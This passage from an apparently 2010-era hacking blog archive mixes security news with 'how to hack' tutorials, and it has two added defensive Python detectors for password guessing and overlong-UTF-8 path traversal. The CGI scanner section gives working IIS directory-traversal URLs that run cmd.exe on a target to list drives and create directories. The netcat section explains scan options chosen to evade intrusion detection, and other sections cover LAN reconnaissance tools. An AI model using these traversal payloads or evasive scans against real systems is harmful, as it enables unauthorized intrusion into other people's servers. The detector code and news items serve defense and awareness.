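Seen from the share owner's side, a password-list run like the one above shows up as a rapid burst of failed logons for one account from one source, sometimes ending in a success. The following Python sketch is an added example, not part of the original post or of Hydra: it flags that pattern in logon records. The log format, the source addresses, the threshold, and the function names are assumptions made for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (hypothetical format: time, source, account, result).
SAMPLE_LOG = """\
2010-03-03T10:14:50 src=172.16.1.55 user=piggy result=FAIL
2010-03-03T10:15:01 src=172.16.1.30 user=kermit result=FAIL
2010-03-03T10:15:02 src=172.16.1.30 user=kermit result=FAIL
2010-03-03T10:15:03 src=172.16.1.30 user=kermit result=FAIL
2010-03-03T10:15:04 src=172.16.1.30 user=kermit result=FAIL
2010-03-03T10:15:05 src=172.16.1.30 user=kermit result=FAIL
2010-03-03T10:15:06 src=172.16.1.30 user=kermit result=FAIL
2010-03-03T10:15:07 src=172.16.1.30 user=kermit result=FAIL
2010-03-03T10:15:08 src=172.16.1.30 user=kermit result=OK
2010-03-03T10:15:10 src=172.16.1.55 user=piggy result=FAIL
2010-03-03T10:15:30 src=172.16.1.55 user=piggy result=OK
"""


def parse(line):
    """Split one record into (timestamp, source, account, result)."""
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return datetime.fromisoformat(ts), kv["src"], kv["user"], kv["result"]


def detect_guessing(lines, threshold=5, window=timedelta(seconds=60)):
    """Flag (source, account) pairs with >= threshold failures inside window.

    Each alert also records whether a successful logon followed while the
    burst was still inside the window, i.e. the guessing probably worked.
    """
    recent = defaultdict(deque)   # (src, user) -> failure times still in window
    totals = defaultdict(int)     # (src, user) -> all failures seen
    alerts = {}                   # (src, user) -> alert record
    for line in lines:
        if not line.strip():
            continue
        ts, src, user, result = parse(line)
        key = (src, user)
        fails = recent[key]
        # Drop failures that have aged out of the sliding window.
        while fails and ts - fails[0] > window:
            fails.popleft()
        if result == "FAIL":
            fails.append(ts)
            totals[key] += 1
            if len(fails) >= threshold and key not in alerts:
                alerts[key] = {
                    "src": src,
                    "user": user,
                    "first_failure": fails[0].isoformat(),
                    "succeeded": False,
                }
        elif result == "OK" and key in alerts and fails:
            alerts[key]["succeeded"] = True
    for key, alert in alerts.items():
        alert["failures"] = totals[key]
    return list(alerts.values())


def run_sample():
    """Run the detector over the constructed sample log."""
    return detect_guessing(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for alert in run_sample():
        print(alert)
```

An alert with succeeded set to True means the account's password should be treated as known to the source and changed.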



How to Identify CGI Vulnerabilities using TCS CGI Scanner

The TCS Common Gateway Interface (CGI) Scanner application is designed to find targets that have vulnerable CGI Script errors. These errors are normally due to systems that have not been patched or updated.
Click to highlight the default target of http://www.tpp.ru and click on the icon at the top left of the application to delete the current target.

On the gray bar along the top left of the application, enter the IP address or hostname of the target and click on the gray-colored arrow to insert the new target. Repeat this process for multiple targets. The TCS CGI Scanner is now ready to scan the target.
In this example, each script run against the target is displayed with the result to the right. The ones of interest are any with a 200 as this indicates a successful attempt.
To execute, right-click on a script and left-click on Copy String. Open Internet Explorer and paste the line in the address bar. Press the Enter key. The directory listing of the target’s C: drive will appear.

The line that should be in the address bar is:

http://172.16.1.40/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

To list the contents of the Program Files directory, edit the address bar to

http://172.16.1.40/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1

Create directory command within the script:

http://172.16.1.40/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:\beenhacked

Notice that the beenhacked directory is now created in the root of the C: drive on the target.
The gray bar along the top right of the application allows you to enter custom scripts for the application to check against the target. If you wanted to check the Program Files directory or create a beenhacked directory on each target it is capable of compromising, you could enter these scripts here and click the downward-pointing arrow to enter the script into the application. Repeat this process for multiple targets.
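In the request strings above, %c0%af stands for the bytes 0xC0 0xAF, an overlong two-byte UTF-8 form of "/", so a path check that runs before decoding never sees the ".." segments as traversal. The following Python sketch is an added example, not part of the original post or of the scanner: it shows how a defender can flag such requests in web server logs. The function names are assumptions, and the sample list is constructed except for the two request strings reused from the text above.

```python
import re
from urllib.parse import unquote_to_bytes

# Sample request targets. Entries 1 and 2 reuse strings shown on this page;
# the rest are constructed for illustration.
SAMPLE_REQUESTS = [
    "/index.html",
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\",
    "/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe"
    "?/c+dir+c:\\progra~1",
    "/docs/caf%c3%a9.html",       # valid two-byte UTF-8, must not be flagged
    "/images/../secret.txt",      # plain traversal
    "/a/%2e%2e%2fetc",            # percent-encoded traversal
]


def find_overlong(raw):
    """Return (offset, hex bytes, char a lenient decoder would produce)."""
    hits, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF:
            n, cp, minimum = 2, b & 0x1F, 0x80
        elif 0xE0 <= b <= 0xEF:
            n, cp, minimum = 3, b & 0x0F, 0x800
        elif 0xF0 <= b <= 0xF7:
            n, cp, minimum = 4, b & 0x07, 0x10000
        else:
            i += 1                # ASCII, stray continuation or invalid lead
            continue
        tail = raw[i + 1:i + n]
        if len(tail) != n - 1 or any((t & 0xC0) != 0x80 for t in tail):
            i += 1                # truncated or malformed sequence
            continue
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        if cp < minimum:          # value fits in a shorter form: overlong
            hits.append((i, raw[i:i + n].hex(), chr(cp)))
        i += n
    return hits


def lenient_decode(raw):
    """Decode the way a permissive server would, accepting overlong forms."""
    parts, pos = [], 0
    for off, hexseq, ch in find_overlong(raw):
        parts.append(raw[pos:off].decode("utf-8", errors="replace"))
        parts.append(ch)
        pos = off + len(hexseq) // 2
    parts.append(raw[pos:].decode("utf-8", errors="replace"))
    return "".join(parts)


def inspect_request(target):
    """Classify the path part of one request target."""
    raw = unquote_to_bytes(target.split("?", 1)[0])
    try:
        raw.decode("utf-8")       # Python's strict decoder rejects 0xC0 0xAF
        strict_ok = True
    except UnicodeDecodeError:
        strict_ok = False
    return {
        "strict_utf8": strict_ok,
        "overlong": [(h, c) for _, h, c in find_overlong(raw)],
        # What a filter sees if it only percent-decodes before checking.
        "naive_traversal": b".." in re.split(rb"[\\/]", raw),
        # What the file system sees after permissive decoding.
        "traversal": ".." in re.split(r"[\\/]", lenient_decode(raw)),
    }


def should_reject(target):
    """Policy: refuse invalid UTF-8 and any path that traverses upward."""
    result = inspect_request(target)
    return (not result["strict_utf8"]) or result["traversal"]


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(should_reject(req), inspect_request(req), req)
```

The naive_traversal and traversal fields differ only for the overlong requests, which is the gap this encoding relies on; rejecting any path that fails strict UTF-8 decoding closes it.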


How to hack FTP Servers: Locate Anonymous FTP Servers using FTPScanner


FTPScanner: The FTPScanner application will locate FTP servers that allow Anonymous connections to occur. These servers must be using the default FTP port of 21 in order for the scanner to detect the server. The biggest concern with FTP is that the data is sent unencrypted (also known as clear text). An attacker that intercepts this clear text can easily read all data within the communication.


Be careful before pressing F1 key in Windows XP

The software giant Microsoft has told Windows XP users not to press the F1 key when prompted by a Web site, as part of a security advisory.

The advisory has been issued regarding an unpatched vulnerability that hackers could exploit to hijack PCs running Internet Explorer (IE). In the advisory, Microsoft confirmed the unpatched bug in VBScript that Polish researcher Maurycy Prodeus had revealed last week.

"The vulnerability exists in the way that VBScript interacts with Windows Help files when using Internet Explorer. If a malicious Web site displayed a specially crafted dialog box and a user pressed the F1 key, arbitrary code could be executed in the security context of the currently logged-on user. On systems running Windows Server 2003, Internet Explorer Enhanced Security Configuration is enabled by default, which helps to mitigate against this issue," reads the advisory.

Recently, Prodeus called the bug a "logic flaw," and said attackers could exploit it by feeding users malicious code disguised as a Windows help file and convincing them to press the F1 key when a pop-up appeared. Such files have a ".hlp" extension.

Windows 2000, Windows XP and Windows Server 2003 are impacted by the bug, said Microsoft, and any supported versions of Internet Explorer (IE) on those operating systems, including IE6 on Windows XP, could be exploited by hackers.

The security advisory said, "Our analysis shows that if users do not press the F1 key on their keyboard, the vulnerability cannot be exploited."

Users can also thwart the attacks by disabling Windows Help.


What is Cyberwar Anyway? A Conversation with Jeff Carr, Author of Inside Cyber Warfare

TNNI: You recently authored a book called Inside Cyber Warfare. Tell us a little about the book. What was your motivation for writing it?
Carr: What I tried to do with the book was take a more complex view of the scope of cyber warfare and really even the misnomer of cyber warfare, because there really isn’t any legal definition as such. There is a cyber component to an actual act of war, but in terms of a battle in cyberspace, we have not really seen that and there is no real definition to that. Instead, the book looks at the various ways that state and non-state actors interact in cyberspace, in order to exercise control or to commit crime or do espionage or any number of actions that network systems now enable actors to do.

TNNI: One of the areas that you just touched on was defining cyber war. Do you think we will ever reach a point where there is a commonly accepted definition, particularly in the international realm?
Carr: Probably. I imagine in time such a thing will occur, it is going to take an awful long time. The biggest problem is that the existing models of what treaties do is something that might not work for cyberspace, and I touch on this in the book.
In my view it is more of a law enforcement issue rather than an issue that can be prescribed through a treaty regime similar to the way that Weapons of Mass Destruction are controlled. I think those treaties will just not be effective for cyberspace. However, I do hope that one day the principal nations will agree on the principles of a collaborative law enforcement effort to crack down on abuses that are committed in that plane.

TNNI: Do you find cyber attacks to be predominantly the work of nation-states or do you also see this as a proliferation of nationalist hackers, and who do you think poses the greater threat?
Carr: I don’t think hackers are going to waste time with anything that does not yield some type of profit. So then it really becomes the question of what was targeted. That is how Grey Logic looks at attribution when it comes to cyber espionage; what have we tied it to what was taken, who would have reason to have entered or accessed it; it has value to what party? Then you can start narrowing the field.


Income Tax Phishing Site- Beware

The above is one of the mails you may receive in your mail box which will redirect you to the below page..BEWARE…
In the Tax Refund Online Form – all fields were compulsory to be filled – like card number, bank account details, Credit card CVV number & ATM PIN etc


See the web address of FAKE SITE (PHISHING SITE)

This is the official website of the Income Tax Department of India; see the difference


NEVER EVER GIVE YOUR DEBIT / CREDIT CARD CVV / CVV2 and EXPIRY DATE TO ANYONE, NOT EVEN TO THE BANK OR A GOVERNMENT OFFICIAL NEITHER ON PHONE OR ONLINE FORM or IN ANY FORM

Beware of Phishing sites. It can cost you all your money.



Tuesday, March 2, 2010

I think you all must be aware of what can happen if you are caught while hacking or trying to expose any pic/mms on a social networking site like Facebook or Orkut.

Visit this link on Youtube and a look how a


How to scan a target for open ports and services using Netcat, SuperScan, Strobe

Netcat: The netcat application has many uses; one is the ability to scan a target for open ports and services. Another utility, cryptcat, is almost identical except that it operates with encryption.

From a DOS prompt, type the following with the syntax of:

Other useful commands for Netcat

The -v option instructs netcat to run in verbose mode, allowing you to see the progress of the scan.
The -r option instructs netcat to randomize local and remote ports in an attempt to elude any intrusion detection systems.
The -w2 option instructs netcat to wait 2 seconds between each port scanned to help elude any intrusion detection systems.
The -z option instructs netcat to operate in a zero-I/O (Input/Output) mode. It is best to use the -z when scanning with netcat.
The 1-1024 instructs netcat to scan ports 1-1024.

*Note: Watch for ports 7, 13, 17, 9, and 19, as these ports can easily be used to create a Denial of Service (DoS). These ports should not be open to the Internet.

SuperScan: SuperScan has the ability to discover which ports are open on the target. Identifying the open ports tells an attacker what ports are available for potential exploit.

Accept the default installation of SuperScan. The installation will occur and the SuperScan application will start.

Strobe: The Strobe application identifies ports open on the target. By identifying the ports available this gives an attacker a potential hole to attempt to punch through and compromise the computer and/or network. Remember that all commands in Linux are case sensitive.

For the Windows-based version install and execute with the following syntax:

./strobe (Target IP)

From the Linux directory containing the compressed file type tar -zxvf strobe103.tar.gz. The files will uncompress into a new directory named strobe. Change to the new directory by typing cd strobe and pressing Enter. From the new directory type make install and press Enter.
To execute Strobe against the target in this example: ./strobe 172.16.1.40

The Strobe application will now execute against the target.



How to hack LAN: Learn How to Identify Target Information on the LAN using LanSpy

Countermeasures: Host-based firewalls, uninstall/disable unnecessary services

Description: The LanSpy application attempts to identify targets within a LAN and from the results of the information identifies the target’s IP address, MAC address, hostname, and probable operating system used, among other information.

From the LanSpy application enter the target IP address. Click on the Green Arrow to start the scan. The results of the scan will be displayed.

How to hack LAN: Learn How to Identify Target Information on the LAN using Passifist

Prerequisites: Compile the Linux script

Countermeasures: Host-based firewalls

Description: The passifist application attempts to identify targets within a Local Area Network (LAN) by listening in passive mode on the LAN and from the results of the information identifies the target’s IP address, MAC address, hostname, and probable operating system used.

Procedure:

Step 1: Download the passifist file and type tar -zxvf passifist_src_1.0.6.tgz.

Step 2: The contents will be extracted into a new directory named passifist. Change to the new directory by typing cd passifist and pressing Enter. From the passifist directory type ./configure and press Enter.
The script will compile to the specific machine it is installed on.

Type in make and press Enter.

Initiate the passive discovery with the following syntax:

./passifist -I eth0 -U "provider=TXT:
filename=foobar.txt"

The results in this example identified seven targets on the LAN. From the options entered when the passifist application was started, the results were saved in a text file named foobar.txt within the directory passifist resides in.

The results identified in the foobar.txt file are shown below


*Note: Remember that the objective is to gather as much information as possible about the target. All of this information is useful to an attacker as it identifies what targets are available and helps guide the attacker in the appropriate direction.


Cyber Space Jihad: An internal Review on Cyber Space cold war

Enrique Salem, President and Chief Executive Officer of California-based Symantec Corporation, warns against a cold war of an unusual kind.

Mr. Salem said cyber space was the battlefield for this war, and might prove a huge threat to virtually the whole world.

The spread of the Internet and the move towards virtualisation to reap operational efficiency has seen a rapid growth in cyber storage. From individuals to corporates and Governments – enterprises have increasingly begun storing their data in cyber space. However, data is far from safe here. According to Mr. Salem, there are definite signs that data on the cyber space was under attack from tech-savvy hackers. He asserted that cyber attacks have become increasingly frequent. “Indian companies also are attacked and targeted,’’ Mr. Salem pointed out.

The real challenge lay in finding out ways to protect the ‘crown jewel’. Considered a critical infrastructure data, the ‘crown jewel’ usually would constitute about 10-15 per cent of total data. Discussing a range of issues on the subject, Mr. Salem said cyber attacks came from within and without. With China and India registering robust GDP growth rates, they were vulnerable to data threats from external hackers, he said. To a question, he said there was greater awareness in India on the possibilities of increased attacks on cyber storage.

Driving innovation, putting in place reputation-based securities and moving towards next generation security technology were among the ways by which Symantec would strive to stay ahead of canny hackers and protect attacks on IP (intellectual property) and critical infrastructure data, he said.

SOURCE: The Hindu


Microsoft warns of new bug affecting IE users

Microsoft warned Monday of a new vulnerability that affects Internet Explorer users, saying that it could be exploited by hackers to install malicious software on a victim's computer.

The flaw lies in the way Microsoft's VBScript works with Windows Help Files in Internet Explorer. But for an attack to work, the victim must press the computer's F1 key, Microsoft said. "Our analysis shows that if users do not press the F1 key on their keyboard, the vulnerability cannot be exploited."

This type of attack is considered harder to pull off because of this F1 key requirement, but Web-based attacks have emerged as a major source of malicious software over the past few years.

The bug was discovered by security researcher Maurycy Prodeus, who posted details of the attack on Friday.

It affects Windows 2000, Windows XP and Windows Server 2003.

Microsoft has not seen the flaw exploited in any online attacks to date, the company said Monday. Microsoft did not say whether it will fix the bug in its next set of security updates, due March 9, but it usually needs more than a couple of weeks to test and release new security patches.

SOURCE: http://www.computerworld.com


Monday, March 1, 2010

PS3 users warned not to use consoles as '8001050f error' crashes network

PS3 owners have been warned not to touch their consoles as 'error: 8001050f' message causes Playstation Network meltdown across the globe.
PS3 gamers across the world have woken up to find their consoles unable to connect online.

In some cases, users have even experienced problems playing offline, as well as finding that Trophy data and saved information had been corrupted by the error.

The 'error: 8001050f' message is thought to be related to a calendar reset on February 28, when the original PS3 systems were reset to January 1, 2000.

Sony have recognised the problem via their Twitter page, posting the following advice for users:

"We're aware that many of you are having problems connecting to PSN, and yes, we're looking into it. Stay tuned for updates."

PS3 games like Red Faction have been affected by the network meltdown
Users with the newer PS3 Slim models are unaffected, but it has been advised that users with older PS3 models should not use their console until further notice.

SOURCE: http://www.metro.co.uk


Microsoft confirms zero day bug

Software giant Microsoft has confirmed it's investigating an unpatched Windows XP bug that hackers could exploit to plant malware on Windows XP machines running Internet Explorer.

Maurycy Prodeus, the Polish security analyst with iSEC Security Research announced on Friday that the flaw could be used by attackers to inject malicious code onto victims' PCs.

Those using Windows XP and IE7 or IE8 are at risk, Prodeus warned.

Redmond said that it is investigating the vulnerability involving the use of VBScript and Windows Help files within Internet Explorer.

Jerry Bryant, a senior manager with the Microsoft Security Response Center (MSRC) has confirmed that Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2, are not affected.
He did say that Redmond has not seen the attack exploited yet.

The bug is a "logic flaw," which attackers could exploit by feeding users malicious code disguised as a Windows help file and then convincing them to press the F1 key when a pop-up appears.

It is a bit tricky to pull off because the attacker needs to force a victim to visit a malicious Web page.

Other insecurity experts have confirmed that the exploit works.

SOURCE: TechEye


25,000 new viruses popping up on the web each day

From 20 new viruses popping up on the web each day 10 years ago to 25,000 new viruses a day this year, the exponential growth of online security threats poses a big problem for many financial services firms.

According to new research by security software provider Symantec, many companies have spent an average US$2 million a year fixing or preventing cyber attacks - an amount that keeps growing as online fraud becomes more sophisticated.

Symantec found in the global study that 9 in 10 Australian and New Zealand companies have been the subject of cyber attacks in the past 12 months. Not surprisingly, 43 per cent of those surveyed ranked security as their top issue, ahead of natural disasters, terrorism and traditional crime.

The scale of the problem is highlighted by Symantec's study, which found all of the 2,100 businesses surveyed across 27 countries suffered a cyber attack in January this year.

Hitting the financial services sector in particular were the Conficker virus and the Silentbanker Trojan. In Australia and New Zealand, a third of those surveyed ranked these viruses as somewhat, if not highly, effective, at causing serious IT problems.

"The fraud and crime happening overall are escalating. Banks are getting attacked every day and the frequency of these attacks are rising, too," said Craig Scroggie, vice president and managing director - Pacific region, for Symantec.

The clean-up costs can be in the millions, said Scroggie. "The cost could be the data loss, or if it's about a company's online shopfront getting attacked and they have to shut it down, you're talking about loss of revenue streams," he added.

One way banks and other financial services firms can avoid these costs is to implement the right IT policy. For example, software security firms knew about the Conficker virus before it spread around the globe - but unless a firm has a strict policy about regularly updating its security program, it would be a case of ‘too little, too late'.

As the old saying goes, prevention is better than the cure, which is why Scroggie said part of Symantec's services is to alert companies about potential online threats before they happen.

SOURCE: http://www.financialstandard.com.au
